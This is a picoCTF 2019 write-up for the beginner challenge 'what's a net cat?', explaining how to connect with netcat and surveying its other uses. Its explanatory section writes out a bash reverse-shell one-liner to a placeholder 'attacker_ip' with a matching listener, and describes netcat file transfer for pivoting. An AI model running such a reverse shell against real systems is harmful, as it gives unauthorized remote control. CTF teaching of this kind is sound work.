what's a net cat? picoCTF 2019 Solution

Published: April 2, 2026

Description

Using netcat (nc) is going to be pretty important. Can you connect to the server at 2019shell1.picoctf.com port 4158 to get the flag?

Remote

Ensure netcat (nc) is installed on your system.

Connect to the challenge server - the flag is printed immediately on connection.

bash
nc 2019shell1.picoctf.com 4158
  1. Step 1Connect and read the flag
    Connecting with nc opens a raw TCP socket to the server. This particular server prints the flag the moment you connect and then closes the connection - no input required.
    bash
    nc 2019shell1.picoctf.com 4158
    Learn more

    netcat (nc) is a networking utility that reads from and writes to network connections using TCP or UDP. It opens a raw socket connection to the target host and port, then bridges stdin/stdout to the socket - anything typed goes to the server, and anything the server sends is printed to the terminal. It is called the "Swiss army knife" of networking tools.

    In CTF competitions, nc is used constantly: connecting to remote challenge servers that run custom binaries, interacting with TCP-based puzzles, and piping exploit scripts to remote services. The basic syntax is always nc hostname port. For TLS/SSL connections, use openssl s_client -connect hostname:port instead.

    netcat is available on virtually every Unix-like system. On Windows, ncat (from Nmap) or nc64.exe serve the same purpose. Common netcat variants include the traditional BSD netcat, OpenBSD netcat (which supports more features), and GNU netcat. The -v flag adds verbose connection output; -n skips DNS resolution; -z scans for open ports without sending data (useful for port scanning).

    • nc host port - connect to host:port (client mode)
    • nc -l port - listen for incoming connections (server mode)
    • nc -u host port - use UDP instead of TCP
    • echo 'data' | nc host port - send data and exit

    netcat as a file transfer tool: because netcat simply pipes bytes between stdin/stdout and a network socket, it can transfer any file. On the receiving end: nc -l 4444 > received_file. On the sending end: nc host 4444 < file_to_send. This raw transfer has no authentication, encryption, or integrity checking, but it is fast and requires no additional software. In CTF challenges involving pivoting or lateral movement, netcat-based file transfer is a quick way to move tools and output between machines.

    Reverse shells with netcat: one of the most important uses of netcat in penetration testing and CTF exploitation is establishing a reverse shell. If you have code execution on a target but cannot bind a port (due to firewall rules blocking inbound traffic), you can have the target connect back to your machine. On the attacker's machine: nc -l -p 4444. On the target (executed via a vulnerability): bash -i >& /dev/tcp/attacker_ip/4444 0>&1. The target initiates the outbound connection, the attacker's nc receives it, and both ends of the shell session are connected. Understanding this technique is fundamental to post-exploitation and CTF pwn challenges.

    pwntools as an upgrade over raw netcat: for complex CTF binary exploitation challenges where you need to parse binary output, send exact byte sequences, and handle timing precisely, the Python library pwntools is the standard tool. It provides remote('host', port) for network connections and process('./binary') for local processes, with methods like recv(), sendline(), recvuntil(), and interactive() that map directly to the kind of interaction netcat provides but with programmatic control. Every CTF pwner eventually graduates from manual netcat sessions to scripted pwntools exploits.

Flag

picoCTF{...}

netcat opens raw TCP connections - connecting to a challenge server that simply waits to print the flag is the simplest possible remote challenge.

Want more picoCTF 2019 writeups?

Useful tools for General Skills

Related reading

What to try next